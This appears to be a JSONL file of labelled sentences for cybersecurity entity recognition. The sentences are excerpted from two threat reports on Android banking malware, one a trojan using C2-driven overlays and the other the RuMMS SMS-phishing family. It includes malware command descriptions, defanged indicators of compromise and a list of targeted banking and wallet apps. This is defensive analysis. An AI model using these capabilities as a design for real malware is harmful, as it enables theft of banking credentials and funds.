{"text": "Beaconing information The ID is generated for each installation of the malware , while the token remains unique .", "spans": {}, "info": {"id": "cyner_train_000981", "source": "cyner_train"}}
{"text": "The beaconing is sent to the URL http : // /api/v2/get.php with an interval of 60 seconds .", "spans": {}, "info": {"id": "cyner_train_000983", "source": "cyner_train"}}
{"text": "Answer from the C2 The C2 will check the country field , if it 's empty or if the country is not targeted , it will reply with a \" Unauthorized '' answer .", "spans": {}, "info": {"id": "cyner_train_000984", "source": "cyner_train"}}
{"text": "List of available commands The command names are self-explanatory .", "spans": {}, "info": {"id": "cyner_train_000986", "source": "cyner_train"}}
{"text": "It is a custom obfuscation partly based on base85 encoding , which is in itself unusual , in malware .", "spans": {}, "info": {"id": "cyner_train_000988", "source": "cyner_train"}}
{"text": "Activation cycle As we have explained above , the malware has several defence mechanisms .", "spans": {}, "info": {"id": "cyner_train_000990", "source": "cyner_train"}}
{"text": "Beside the obfuscation and the environment checks , the malware also has some interesting anti-sandbox mechanisms .", "spans": {}, "info": {"id": "cyner_train_000991", "source": "cyner_train"}}
{"text": "The user needs to press the \" close '' button to finish the installation .", "spans": {}, "info": {"id": "cyner_train_000993", "source": "cyner_train"}}
{"text": "However , this wo n't close the application , it will send it to the background , instead .", "spans": {}, "info": {"id": "cyner_train_000994", "source": "cyner_train"}}
{"text": "The beaconing will only start after the application is removed from the background , ultimately stopping it .", "spans": {}, "info": {"id": "cyner_train_000996", "source": "cyner_train"}}
{"text": "This will be the trigger for the service to start the beaconing .", "spans": {}, "info": {"id": "cyner_train_000997", "source": "cyner_train"}}
{"text": "As mentioned previously , the beaconing is done every 60 seconds .", "spans": {}, "info": {"id": "cyner_train_000998", "source": "cyner_train"}}
{"text": "However , no command is received from the C2 until the inactiveTime field ( see beaconing information image above ) has at least the value of 2000000 .", "spans": {}, "info": {"id": "cyner_train_000999", "source": "cyner_train"}}
{"text": "This time resets every time the user performs some activity .", "spans": {}, "info": {"id": "cyner_train_001000", "source": "cyner_train"}}
{"text": "After the checks , the malware becomes active , but first , it goes through seven steps , each one calling a different command : uploadPhoneNumbers : Exfiltrates all phone numbers that are in the contact list .", "spans": {}, "info": {"id": "cyner_train_001001", "source": "cyner_train"}}
{"text": "Aside from the natural value of phone numbers associated with the names of their owners .", "spans": {}, "info": {"id": "cyner_train_001002", "source": "cyner_train"}}
{"text": "Using the SMS has an initial infection vector is another possibility for the exfiltration .", "spans": {}, "info": {"id": "cyner_train_001003", "source": "cyner_train"}}
{"text": "One of the purposes of the exfiltration of the contact list is to use them to attack other victims using SMS as an initial vector .", "spans": {}, "info": {"id": "cyner_train_001004", "source": "cyner_train"}}
{"text": "checkApps : Asks the malware to see if the packages sent as parameters are installed .", "spans": {}, "info": {"id": "cyner_train_001005", "source": "cyner_train"}}
{"text": "The malware contains a list of 209 packages hardcoded in its source code .", "spans": {}, "info": {"id": "cyner_train_001006", "source": "cyner_train"}}
{"text": "List of packages received from the C2 adminNumber : Setup of the admin phone number .", "spans": {}, "info": {"id": "cyner_train_001008", "source": "cyner_train"}}
{"text": "In our case , the administrator phone number belongs to a mobile network in Australia .", "spans": {}, "info": {"id": "cyner_train_001009", "source": "cyner_train"}}
{"text": "Phone number for administration changeServer : At this point , the malware changes the C2 to a new host , even though the API and communication protocol continues to be the same .", "spans": {}, "info": {"id": "cyner_train_001010", "source": "cyner_train"}}
{"text": "Change server request The URL 's for the new server is obfuscated , preventing easy network identification .", "spans": {}, "info": {"id": "cyner_train_001011", "source": "cyner_train"}}
{"text": "changeActivity : This command will set up the webview to overlay any of the target activities .", "spans": {}, "info": {"id": "cyner_train_001012", "source": "cyner_train"}}
{"text": "params : This command allows the malicious operator to change configuration parameters in the malware .", "spans": {}, "info": {"id": "cyner_train_001014", "source": "cyner_train"}}
{"text": "Command to change the beaconing changeArchive : The final command of the activation cycle is the download of an archive .", "spans": {}, "info": {"id": "cyner_train_001016", "source": "cyner_train"}}
{"text": "This archive is stored in the same host has the webviews .", "spans": {}, "info": {"id": "cyner_train_001017", "source": "cyner_train"}}
{"text": "The archive is a ZIP containing several files , which is protected with a password .", "spans": {}, "info": {"id": "cyner_train_001018", "source": "cyner_train"}}
{"text": "These activities depend on the device configuration .", "spans": {}, "info": {"id": "cyner_train_001021", "source": "cyner_train"}}
{"text": "These are adapted to the information the malicious operator wants to retrieve .", "spans": {}, "info": {"id": "cyner_train_001023", "source": "cyner_train"}}
{"text": "The first webview overlay is created on step 6 of the activation cycle .", "spans": {}, "info": {"id": "cyner_train_001024", "source": "cyner_train"}}
{"text": "This file contains all HTML , CSS and PNG files necessary to create overlays .", "spans": {}, "info": {"id": "cyner_train_001027", "source": "cyner_train"}}
{"text": "Talos found 189 logos from banks to cryptocurrency exchanges inside the archive , all of which could be targeted .", "spans": {}, "info": {"id": "cyner_train_001028", "source": "cyner_train"}}
{"text": "The archive also contained all the necessary codes to target Australian financial institutions .", "spans": {}, "info": {"id": "cyner_train_001029", "source": "cyner_train"}}
{"text": "The overlays are activated by the malicious operator using the command changeActivity , as seen on step 5 of the activation cycle .", "spans": {}, "info": {"id": "cyner_train_001030", "source": "cyner_train"}}
{"text": "In this case , we can see that the HTML code of the overlay is stored in the C2 infrastructure .", "spans": {}, "info": {"id": "cyner_train_001031", "source": "cyner_train"}}
{"text": "However , since the archive that is downloaded into the device has all the necessary information and the malicious actor has access to the device via SMS , the malicious operator can keep its activity even without the C2 infrastructure .", "spans": {}, "info": {"id": "cyner_train_001032", "source": "cyner_train"}}
{"text": "Infrastructure The infrastructure supporting this malware is rather complex .", "spans": {}, "info": {"id": "cyner_train_001033", "source": "cyner_train"}}
{"text": "It is clear that on all stages there are at least two layers .", "spans": {}, "info": {"id": "cyner_train_001034", "source": "cyner_train"}}
{"text": "The infrastructure has several layers , although not being very dynamic , still has several layers each one providing some level of protection .", "spans": {}, "info": {"id": "cyner_train_001035", "source": "cyner_train"}}
{"text": "All the IP addresses belong to the same company Hetzner , an IP-hosting firm in Germany .", "spans": {"ORGANIZATION: Hetzner": [[48, 55]]}, "info": {"id": "cyner_train_001036", "source": "cyner_train"}}
{"text": "COVERAGE Cisco Cloud Web Security ( CWS ) or Web Security Appliance ( WSA ) web scanning prevents access to malicious websites and detects malware used in these attacks .", "spans": {"ORGANIZATION: Cisco": [[9, 14]], "SYSTEM: Cloud Web Security": [[15, 33]], "SYSTEM: Web Security Appliance": [[45, 67]]}, "info": {"id": "cyner_train_001037", "source": "cyner_train"}}
{"text": "Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org .", "spans": {}, "info": {"id": "cyner_train_001042", "source": "cyner_train"}}
{"text": "INDICATORS OF COMPROMISE ( IOCS ) Domains Facebook-photos-au.su Homevideo2-12l.ml videohosting1-5j.gq URLs hxxp : //88.99.227 [ .", "spans": {}, "info": {"id": "cyner_train_001043", "source": "cyner_train"}}
{"text": "] 26/html2/2018/GrafKey/new-inj-135-3-dark.html hxxp : //88.99.227 [ .", "spans": {}, "info": {"id": "cyner_train_001044", "source": "cyner_train"}}
{"text": "] 26/html2/arc92/au483x.zip hxxp : //94.130.106 [ .", "spans": {}, "info": {"id": "cyner_train_001045", "source": "cyner_train"}}
{"text": "] 117:8080/api/v1/report/records.php hxxp : //88.99.227 [ .", "spans": {}, "info": {"id": "cyner_train_001046", "source": "cyner_train"}}
{"text": "] 26/html2/new-inj-135-3-white.html hxxp : //facebook-photos-au [ .", "spans": {}, "info": {"id": "cyner_train_001047", "source": "cyner_train"}}
{"text": "] ml/mms3/download_3.php IP addresses 78.46.201.36 88.99.170.84 88.99.227.26 94.130.106.117 88.99.174.200 88.99.189.31 Hash 369fcf48c1eb982088c22f86672add10cae967af82613bee6fb8a3669603dc48 b2d4fcf03c7a8bf135fbd3073bea450e2e6661ad8ef2ab2058a3c04f81fc3f3e", "spans": {}, "info": {"id": "cyner_train_001049", "source": "cyner_train"}}
{"text": "8f5d5d8419a4832d175a6028c9e7d445f1e99fdc12170db257df79831c69ae4e a5ebcdaf5fd10ec9de85d62e48cc97a4e08c699a7ebdeab0351b86ab1370557d 84578b9b2c3cc1c7bbfcf4038a6c76ae91dfc82eef5e4c6815627eaf6b4ae6f6", "spans": {}, "info": {"id": "cyner_train_001050", "source": "cyner_train"}}
{"text": "89eecd91dff4bf42bebbf3aa85aa512ddf661d3e9de4c91196c98f4fc325a018 9edee3f3d539e3ade61ac2956a6900d93ba3b535b6a76b3a9ee81e2251e25c61 0e48e5dbc3a60910c1460b382d28e087a580f38f57d3f82d4564309346069bd1 c113cdd2a5e164dcba157fc4e6026495a1cfbcb0b1a8bf3e38e7eddbb316e01f", "spans": {}, "info": {"id": "cyner_train_001051", "source": "cyner_train"}}
{"text": "1819d2546d9c9580193827c0d2f5aad7e7f2856f7d5e6d40fd739b6cecdb1e9e b213c1de737b72f8dd7185186a246277951b651c64812692da0b9fdf1be5bf15 453e7827e943cdda9121948f3f4a68d6289d09777538f92389ca56f6e6de03f0 0246dd4acd9f64ff1508131c57a7b29e995e102c74477d5624e1271700ecb0e2", "spans": {}, "info": {"id": "cyner_train_001052", "source": "cyner_train"}}
{"text": "88034e0eddfdb6297670d28ed810aef87679e9492e9b3e782cc14d9d1a55db84 e08f08f4fa75609731c6dd597dc55c8f95dbdd5725a6a90a9f80134832a07f2e 01c5b637f283697350ca361f241416303ab6123da4c6726a6555ac36cb654b5c 1fb06666befd581019af509951320c7e8535e5b38ad058069f4979e9a21c7e1c", "spans": {}, "info": {"id": "cyner_train_001053", "source": "cyner_train"}}
{"text": "6bdfb79f813448b7f1b4f4dbe6a45d1938f3039c93ecf80318cedd1090f7e341 ADDITIONAL INFORMATION Packages monitored pin.secret.access com.chase.sig.android com.morganstanley.clientmobile.prod com.wf.wellsfargomobile com.citi.citimobile com.konylabs.capitalone com.infonow.bofa com.htsu.hsbcpersonalbanking com.usaa.mobile.android.usaa", "spans": {}, "info": {"id": "cyner_train_001054", "source": "cyner_train"}}
{"text": "com.schwab.mobile com.americanexpress.android.acctsvcs.us com.pnc.ecommerce.mobile com.regions.mobbanking com.clairmail.fth com.grppl.android.shell.BOS com.tdbank com.huntington.m com.citizensbank.androidapp com.usbank.mobilebanking com.ally.MobileBanking com.key.android com.unionbank.ecommerce.mobile.android com.mfoundry.mb.android.mb_BMOH071025661", "spans": {}, "info": {"id": "cyner_train_001055", "source": "cyner_train"}}
{"text": "com.bbt.cmol com.sovereign.santander com.mtb.mbanking.sc.retail.prod com.fi9293.godough com.commbank.netbank org.westpac.bank org.stgeorge.bank au.com.nab.mobile au.com.bankwest.mobile au.com.ingdirect.android org.banksa.bank com.anz.android com.anz.android.gomoney com.citibank.mobile.au org.bom.bank com.latuabancaperandroid", "spans": {}, "info": {"id": "cyner_train_001056", "source": "cyner_train"}}
{"text": "com.comarch.mobile com.jpm.sig.android com.konylabs.cbplpat by.belinvestbank no.apps.dnbnor com.arkea.phonegap com.alseda.bpssberbank com.belveb.belvebmobile com.finanteq.finance.ca pl.eurobank pl.eurobank2 pl.noblebank.mobile com.getingroup.mobilebanking hr.asseco.android.mtoken.getin pl.getinleasing.mobile com.icp.ikasa.getinon", "spans": {}, "info": {"id": "cyner_train_001057", "source": "cyner_train"}}
{"text": "eu.eleader.mobilebanking.pekao softax.pekao.powerpay softax.pekao.mpos dk.jyskebank.mobilbank com.starfinanz.smob.android.bwmobilbanking eu.newfrontier.iBanking.mobile.SOG.Retail com.accessbank.accessbankapp com.sbi.SBIFreedomPlus com.zenithBank.eazymoney net.cts.android.centralbank com.f1soft.nmbmobilebanking.activities.main com.lb.smartpay com.mbmobile", "spans": {}, "info": {"id": "cyner_train_001058", "source": "cyner_train"}}
{"text": "com.db.mobilebanking com.botw.mobilebanking com.fg.wallet com.sbi.SBISecure com.icsfs.safwa com.interswitchng.www com.dhanlaxmi.dhansmart.mtc com.icomvision.bsc.tbc hr.asseco.android.jimba.cecro com.vanso.gtbankapp com.fss.pnbpsp com.mfino.sterling cy.com.netinfo.netteller.boc ge.mobility.basisbank com.snapwork.IDBI", "spans": {}, "info": {"id": "cyner_train_001059", "source": "cyner_train"}}
{"text": "com.lcode.apgvb com.fact.jib mn.egolomt.bank com.pnbrewardz com.firstbank.firstmobile wit.android.bcpBankingApp.millenniumPL com.grppl.android.shell.halifax com.revolut.revolut de.commerzbanking.mobil uk.co.santander.santanderUK se.nordea.mobilebank com.snapwork.hdfc com.csam.icici.bank.imobile com.msf.kbank.mobile", "spans": {}, "info": {"id": "cyner_train_001060", "source": "cyner_train"}}
{"text": "com.bmm.mobilebankingapp net.bnpparibas.mescomptes fr.banquepopulaire.cyberplus com.caisseepargne.android.mobilebanking com.palatine.android.mobilebanking.prod com.ocito.cdn.activity.creditdunord com.fullsix.android.labanquepostale.accountaccess mobi.societegenerale.mobile.lappli com.db.businessline.cardapp com.skh.android.mbanking com.ifs.banking.fiid1491", "spans": {}, "info": {"id": "cyner_train_001061", "source": "cyner_train"}}
{"text": "de.dkb.portalapp pl.pkobp.ipkobiznes pl.com.suntech.mobileconnect eu.eleader.mobilebanking.pekao.firm pl.mbank pl.upaid.nfcwallet.mbank eu.eleader.mobilebanking.bre pl.asseco.mpromak.android.app.bre pl.asseco.mpromak.android.app.bre.hd pl.mbank.mnews eu.eleader.mobilebanking.raiffeisen pl.raiffeisen.nfc hr.asseco.android.jimba.rmb", "spans": {}, "info": {"id": "cyner_train_001062", "source": "cyner_train"}}
{"text": "com.advantage.RaiffeisenBank pl.bzwbk.ibiznes24 pl.bzwbk.bzwbk24 pl.bzwbk.mobile.tab.bzwbk24 com.comarch.mobile.investment com.android.vending com.snapchat.android jp.naver.line.android com.viber.voip com.gettaxi.android com.whatsapp com.tencent.mm com.skype.raider com.ubercab com.paypal.android.p2pmobile", "spans": {}, "info": {"id": "cyner_train_001063", "source": "cyner_train"}}
{"text": "com.circle.android com.coinbase.android com.walmart.android com.bestbuy.android com.ebay.gumtree.au com.ebay.mobile com.westernunion.android.mtapp com.moneybookers.skrillpayments com.gyft.android com.amazon.mShop.android.shopping com.comarch.mobile.banking.bgzbnpparibas.biznes pl.bnpbgzparibas.firmapp com.finanteq.finance.bgz pl.upaid.bgzbnpp", "spans": {}, "info": {"id": "cyner_train_001064", "source": "cyner_train"}}
{"text": "de.postbank.finanzassistent pl.bph de.comdirect.android com.starfinanz.smob.android.sfinanzstatus de.sdvrz.ihb.mobile.app pl.ing.mojeing com.ing.mobile pl.ing.ingksiegowosc com.comarch.security.mobilebanking com.comarch.mobile.investment.ing com.ingcb.mobile.cbportal de.buhl.finanzblick pl.pkobp.iko pl.ipko.mobile pl.inteligo.mobile de.number26.android", "spans": {}, "info": {"id": "cyner_train_001065", "source": "cyner_train"}}
{"text": "pl.millennium.corpApp eu.transfer24.app pl.aliorbank.aib pl.corelogic.mtoken alior.bankingapp.android com.ferratumbank.mobilebank com.swmind.vcc.android.bzwbk_mobile.app de.schildbach.wallet piuk.blockchain.android com.bitcoin.mwallet com.btcontract.wallet com.bitpay.wallet com.bitpay.copay btc.org.freewallet.app org.electrum.electrum", "spans": {}, "info": {"id": "cyner_train_001066", "source": "cyner_train"}}
{"text": "com.xapo com.airbitz com.kibou.bitcoin com.qcan.mobile.bitcoin.wallet me.cryptopay.android com.bitcoin.wallet lt.spectrofinance.spectrocoin.android.wallet com.kryptokit.jaxx com.wirex bcn.org.freewallet.app com.hashengineering.bitcoincash.wallet bcc.org.freewallet.app com.coinspace.app btg.org.freewallet.app net.bither", "spans": {}, "info": {"id": "cyner_train_001067", "source": "cyner_train"}}
{"text": "co.edgesecure.app com.arcbit.arcbit distributedlab.wallet de.schildbach.wallet_test com.aegiswallet com.plutus.wallet com.coincorner.app.crypt eth.org.freewallet.app secret.access secret.pattern RuMMS : The Latest Family of Android Malware Attacking Users in Russia Via SMS Phishing April 26 , 2016 Introduction Recently we observed an Android malware family being used to attack users in Russia .", "spans": {"MALWARE: RuMMS": [[195, 200]], "SYSTEM: Android": [[224, 231]], "MALWARE: Android": [[336, 343]]}, "info": {"id": "cyner_train_001068", "source": "cyner_train"}}
{"text": "The malware samples were mainly distributed through a series of malicious subdomains registered under a legitimate domain belonging to a well-known shared hosting service provider in Russia .", "spans": {}, "info": {"id": "cyner_train_001069", "source": "cyner_train"}}
{"text": "Because all the URLs used in this campaign have the form of hxxp : //yyyyyyyy [ .", "spans": {}, "info": {"id": "cyner_train_001070", "source": "cyner_train"}}
{"text": "] XXXX.ru/mms.apk ( where XXXX.ru represents the hosting provider ’ s domain ) , we named this malware family RuMMS .", "spans": {"MALWARE: RuMMS": [[110, 115]]}, "info": {"id": "cyner_train_001071", "source": "cyner_train"}}
{"text": "To lure the victims to download the malware , threat actors use SMS phishing – sending a short SMS message containing a malicious URL to the potential victims .", "spans": {}, "info": {"id": "cyner_train_001072", "source": "cyner_train"}}
{"text": "Unwary users who click the seemingly innocuous link will have their device infected with RuMMS malware .", "spans": {"MALWARE: RuMMS": [[89, 94]]}, "info": {"id": "cyner_train_001073", "source": "cyner_train"}}
{"text": "Figure 1 describes this infection process and the main behaviors of RuMMS .", "spans": {"MALWARE: RuMMS": [[68, 73]]}, "info": {"id": "cyner_train_001074", "source": "cyner_train"}}
{"text": "On April 3 , 2016 , we still observed new RuMMS samples emerging in the wild .", "spans": {"MALWARE: RuMMS": [[42, 47]]}, "info": {"id": "cyner_train_001075", "source": "cyner_train"}}
{"text": "Within this time period , we identified close to 300 samples belonging to this family ( all sample hashes are listed in the Appendix ) .", "spans": {}, "info": {"id": "cyner_train_001077", "source": "cyner_train"}}
{"text": "After landing on the victim ’ s phone , the RuMMS apps will request device administrator privileges , remove their icons to hide themselves from users , and remain running in the background to perform a series of malicious behaviors .", "spans": {"MALWARE: RuMMS": [[44, 49]]}, "info": {"id": "cyner_train_001078", "source": "cyner_train"}}
{"text": "So far we have identified the following behaviors : Sending device information to a remote command and control ( C2 ) server .", "spans": {}, "info": {"id": "cyner_train_001079", "source": "cyner_train"}}
{"text": "Contacting the C2 server for instructions .", "spans": {}, "info": {"id": "cyner_train_001080", "source": "cyner_train"}}
{"text": "Sending SMS messages to financial institutions to query account balances .", "spans": {}, "info": {"id": "cyner_train_001081", "source": "cyner_train"}}
{"text": "Uploading any incoming SMS messages ( including the balance inquiry results ) to the remote C2 server .", "spans": {}, "info": {"id": "cyner_train_001082", "source": "cyner_train"}}
{"text": "Each of these behaviors is under the control of the remote C2 server .", "spans": {}, "info": {"id": "cyner_train_001085", "source": "cyner_train"}}
{"text": "In other words , the C2 server can specify the message contents to be sent , the time period in which to forward the voice call , and the recipients of outgoing messages .", "spans": {}, "info": {"id": "cyner_train_001086", "source": "cyner_train"}}
{"text": "As part of our investigation into this malware , we emulated an infected Android device in order to communicate with the RuMMS C2 server .", "spans": {"SYSTEM: Android": [[73, 80]], "MALWARE: RuMMS": [[121, 126]]}, "info": {"id": "cyner_train_001087", "source": "cyner_train"}}
{"text": "During one session , the C2 server commanded our emulated device to send four different SMS messages to four different phone numbers , all of which were associated with Russian financial institutions .", "spans": {}, "info": {"id": "cyner_train_001088", "source": "cyner_train"}}
{"text": "At least three of the messages were intended to check a user ’ s account balance at the institution ( we could not confirm the purpose of the fourth ) .Through additional research , we identified several forum posts where victims complained of funds ( up to 600 rubles ) were transferred out of their accounts after RuMMS infected their phones .", "spans": {"MALWARE: RuMMS": [[316, 321]]}, "info": {"id": "cyner_train_001089", "source": "cyner_train"}}
{"text": "We do not know exactly how many people have been infected with RuMMS malware .", "spans": {"MALWARE: RuMMS": [[63, 68]]}, "info": {"id": "cyner_train_001090", "source": "cyner_train"}}
{"text": "However , our data suggests that there have been at least 2,729 infections between January 2016 and early April 2016 , with a peak in March of more than 1,100 infections .", "spans": {}, "info": {"id": "cyner_train_001091", "source": "cyner_train"}}
{"text": "Smishing ( SMS phishing ) is currently the primary way threat actors are distributing the malware .", "spans": {}, "info": {"id": "cyner_train_001093", "source": "cyner_train"}}
{"text": "An example SMS message is shown in Figure 1 .", "spans": {}, "info": {"id": "cyner_train_001095", "source": "cyner_train"}}
{"text": "All of the URLs reference the file “ mms.apk ” and all use the domain “ XXXX.ru ” , which belongs to a top five shared hosting platform in Russia ( the domain itself has been obfuscated to anonymize the provider ) .", "spans": {}, "info": {"id": "cyner_train_001097", "source": "cyner_train"}}
{"text": "The threat actors registered at least seven subdomains through the hosting provider , each consisting of eight random-looking characters ( asdfgjcr , cacama18 , cacamadf , konkonq2 , mmsmtsh5 , riveroer , and sdfkjhl2 .", "spans": {}, "info": {"id": "cyner_train_001098", "source": "cyner_train"}}
{"text": ") As of this writing , no files were hosted at any of the links .", "spans": {}, "info": {"id": "cyner_train_001099", "source": "cyner_train"}}
{"text": "Use of a shared hosting service to distribute malware is highly flexible and low cost for the threat actors .", "spans": {}, "info": {"id": "cyner_train_001101", "source": "cyner_train"}}
{"text": "It is also much harder for network defenders or researchers to track a campaign where the infrastructure is a moving target .", "spans": {}, "info": {"id": "cyner_train_001102", "source": "cyner_train"}}
{"text": "Many top providers in Russia offer cheap prices for their shared hosting services , and some even provide free 30-day trial periods .", "spans": {}, "info": {"id": "cyner_train_001103", "source": "cyner_train"}}
{"text": "Threat actors can register subdomains through the hosting provider and use the provider ’ s services for a short-period campaign .", "spans": {}, "info": {"id": "cyner_train_001104", "source": "cyner_train"}}
{"text": "In addition , these out-of-the-box hosting services usually provide better infrastructure than the attackers could manage to construct ( or compromise ) themselves .", "spans": {}, "info": {"id": "cyner_train_001106", "source": "cyner_train"}}
{"text": "RuMMS Code Analysis All RuMMS samples share the same behaviors , major parts of which are shown in Figure 1 .", "spans": {"MALWARE: RuMMS": [[0, 5], [24, 29]]}, "info": {"id": "cyner_train_001107", "source": "cyner_train"}}
{"text": "We used a sample app named “ org.starsizew ” with an MD5 of d8caad151e07025fdbf5f3c26e3ceaff to analyze RuMMS ’ s code .", "spans": {"MALWARE: RuMMS": [[104, 109]]}, "info": {"id": "cyner_train_001109", "source": "cyner_train"}}
{"text": "Several of the main components of RuMMS are shown in Figure 2 .", "spans": {"MALWARE: RuMMS": [[34, 39]]}, "info": {"id": "cyner_train_001110", "source": "cyner_train"}}
{"text": "The activity class “ org.starsizew.MainActivity ” executes when the app is started .", "spans": {}, "info": {"id": "cyner_train_001111", "source": "cyner_train"}}
{"text": "It first starts another activity defined in “ org.starsizew.Aa ” to request device administrator privileges , and then calls the following API of “ android.content.pm.PackageManager ” ( the Android package manager to remove its own icon on the home screen in order to conceal the existence of RuMMS from the user : At the same time , ” org.starsizew.MainActivity ” will start the main service as defined in “ org.starsizew.Tb ” , and use a few mechanisms to keep the main service running continuously", "spans": {"SYSTEM: Android": [[190, 197]], "MALWARE: RuMMS": [[293, 298]]}, "info": {"id": "cyner_train_001112", "source": "cyner_train"}}
{"text": "The class “ org.starsizew.Tb ” also has a self-monitoring mechanism to restart itself when its own onDestroy API is triggered .", "spans": {}, "info": {"id": "cyner_train_001115", "source": "cyner_train"}}
{"text": "All those functions are implemented in asynchronous tasks by “ org.starsizew.i ” .", "spans": {}, "info": {"id": "cyner_train_001117", "source": "cyner_train"}}
{"text": "Its major functionality is also implemented through the call of the asynchronous task ( “ org.starsizew.i ” ) , including uploading the incoming SMS messages to the remote C2 server and executing any commands as instructed by the remote attacker .", "spans": {}, "info": {"id": "cyner_train_001119", "source": "cyner_train"}}
{"text": "C2 Communication The C2 communication includes two parts : sending information to the remote HTTP server and parsing the server ’ s response to execute any commands as instructed by the remote attackers .", "spans": {}, "info": {"id": "cyner_train_001120", "source": "cyner_train"}}
{"text": "Method doInBackground : to send information to remote C2 server As seen from the major code body of method doInBackground shown in Figure 3 ( some of the original classes and methods are renamed for easier understanding ) , there are three calls to HttpPost with different contents as parameters .", "spans": {}, "info": {"id": "cyner_train_001123", "source": "cyner_train"}}
{"text": "At line 5 , local variable v4 specifies the first parameter url , which can be changed by the remote C2 server later .", "spans": {}, "info": {"id": "cyner_train_001124", "source": "cyner_train"}}
{"text": "These URLs are all in the form of “ http : // $ C2. $ SERVER. $ IP/api/ ?", "spans": {}, "info": {"id": "cyner_train_001125", "source": "cyner_train"}}
{"text": "The second parameter is a constant string “ POST ” , and the third parameter is a series of key-value pairs to be sent , assembled at runtime .", "spans": {}, "info": {"id": "cyner_train_001127", "source": "cyner_train"}}
{"text": "It only has two parts , the method indicated by word “ info ” and the victim identifier .", "spans": {}, "info": {"id": "cyner_train_001130", "source": "cyner_train"}}
{"text": "sms_send : to send C2-specified SMS messages to C2-specified recipients .", "spans": {}, "info": {"id": "cyner_train_001134", "source": "cyner_train"}}
{"text": "sms_grab : to upload periodically the SMS messages in the inbox to C2 server .", "spans": {}, "info": {"id": "cyner_train_001135", "source": "cyner_train"}}
{"text": "delivery : to deliver specified text to all victim ’ s contacts ( SMS worming ) .", "spans": {}, "info": {"id": "cyner_train_001136", "source": "cyner_train"}}
{"text": "call_number : to forward phone calls to intercept voice based two-factor authentication .", "spans": {}, "info": {"id": "cyner_train_001137", "source": "cyner_train"}}
{"text": "new_url : to change the URL of the C2 server in the app preference .", "spans": {}, "info": {"id": "cyner_train_001138", "source": "cyner_train"}}
{"text": "ussd : to call a C2-specified phone number .", "spans": {}, "info": {"id": "cyner_train_001139", "source": "cyner_train"}}
{"text": "Method onPostExecute : to handle instructions from remote C2 Figure 6 shows an example response sent back from one C2 server .", "spans": {}, "info": {"id": "cyner_train_001141", "source": "cyner_train"}}
{"text": "Note that inside this single response , there is one “ install_true ” command , one “ sms_grab ” command and four “ sms_send ” commands .", "spans": {}, "info": {"id": "cyner_train_001142", "source": "cyner_train"}}
{"text": "With the four “ sms_send ” commands , the messages as specified in the key “ text ” will be sent immediately to the specified short numbers .", "spans": {}, "info": {"id": "cyner_train_001143", "source": "cyner_train"}}
{"text": "Example Response in JSON format In particular , short number “ +7494 ” is associated with a payment service provider in Russia .", "spans": {}, "info": {"id": "cyner_train_001146", "source": "cyner_train"}}
{"text": "For example , sending text “ Balance ” will trigger a response with the victim ’ s wallet balance .", "spans": {}, "info": {"id": "cyner_train_001148", "source": "cyner_train"}}
{"text": "Sending text “ confirm 1 ” will include proof of payment .", "spans": {}, "info": {"id": "cyner_train_001149", "source": "cyner_train"}}
{"text": "Sending text “ call on ” will activate the USSD payment confirmation service .", "spans": {}, "info": {"id": "cyner_train_001150", "source": "cyner_train"}}
{"text": "During our investigation , we observed the C2 server sending multiple “ balance ” commands to different institutions , presumably to query the victim ’ s financial account balances .", "spans": {}, "info": {"id": "cyner_train_001151", "source": "cyner_train"}}
{"text": "These could include resetting the user ’ s PIN , enabling or disabling various alerts and confirmations , and confirming the user ’ s identity .", "spans": {}, "info": {"id": "cyner_train_001153", "source": "cyner_train"}}
{"text": "Figure 7 lists the IP addresses of these C2 servers , the number of RuMMS apps that connect to each of them , and the example URL used as the first parameter of the HttpPost operation ( used in the code of Figure 3 ) .", "spans": {"MALWARE: RuMMS": [[68, 73]]}, "info": {"id": "cyner_train_001155", "source": "cyner_train"}}
{"text": "This indicates that multiple C2 servers were used in this campaign , but one ( 37.1.207.31 ) was the most heavily used .", "spans": {}, "info": {"id": "cyner_train_001156", "source": "cyner_train"}}
{"text": "In the quadrant , the smaller boxes in blue-gray represent particular apps in the RuMMS family , while the bigger boxes in deep-blue represent C2 servers used by some RuMMS apps .", "spans": {"MALWARE: RuMMS": [[82, 87], [167, 172]]}, "info": {"id": "cyner_train_001159", "source": "cyner_train"}}
{"text": "In this figure we have 11 RuMMS samples , all of which were hosted on the website as shown in the “ y ” axis .", "spans": {"MALWARE: RuMMS": [[26, 31]]}, "info": {"id": "cyner_train_001161", "source": "cyner_train"}}
{"text": "The dates on the “ x ” axis show the dates when we first saw these apps in the wild .", "spans": {}, "info": {"id": "cyner_train_001162", "source": "cyner_train"}}
{"text": "Threat actors used different websites to host different payloads at different times .", "spans": {}, "info": {"id": "cyner_train_001164", "source": "cyner_train"}}
{"text": "This kind of “ moving target ” behavior made it harder to track their actions .", "spans": {}, "info": {"id": "cyner_train_001165", "source": "cyner_train"}}
{"text": "C2 servers are shared by multiple samples .", "spans": {}, "info": {"id": "cyner_train_001167", "source": "cyner_train"}}
{"text": "RuMMS samples , hosting sites , C2 servers from Jan. 2016 to Mar .", "spans": {"MALWARE: RuMMS": [[0, 5]]}, "info": {"id": "cyner_train_001170", "source": "cyner_train"}}
{"text": "Figure 9 shows the number of RuMMS infections recorded in the last four months .", "spans": {"MALWARE: RuMMS": [[29, 34]]}, "info": {"id": "cyner_train_001172", "source": "cyner_train"}}
{"text": "In February , we recorded 767 infections .", "spans": {}, "info": {"id": "cyner_train_001174", "source": "cyner_train"}}
{"text": "In March , it peaked at 1,169 infections .", "spans": {}, "info": {"id": "cyner_train_001175", "source": "cyner_train"}}
{"text": "In April , at the time of writing this post , we recorded 413 RuMMS infections .", "spans": {"MALWARE: RuMMS": [[62, 67]]}, "info": {"id": "cyner_train_001176", "source": "cyner_train"}}
{"text": "Although the propagation trend seems to be slowing down a bit , the figure tells us that RuMMS malware is still alive in the wild .", "spans": {"MALWARE: RuMMS": [[89, 94]]}, "info": {"id": "cyner_train_001177", "source": "cyner_train"}}
{"text": "We continue to monitor its progress .", "spans": {}, "info": {"id": "cyner_train_001178", "source": "cyner_train"}}
{"text": "The recent RuMMS campaign shows that Smishing is still a popular means for threat actors to distribute their malware .", "spans": {"MALWARE: RuMMS": [[11, 16]]}, "info": {"id": "cyner_train_001180", "source": "cyner_train"}}
{"text": "In addition , the use of shared-hosting providers adds flexibility to the threat actor ’ s campaign and makes it harder for defending parties to track these moving targets .", "spans": {}, "info": {"id": "cyner_train_001181", "source": "cyner_train"}}
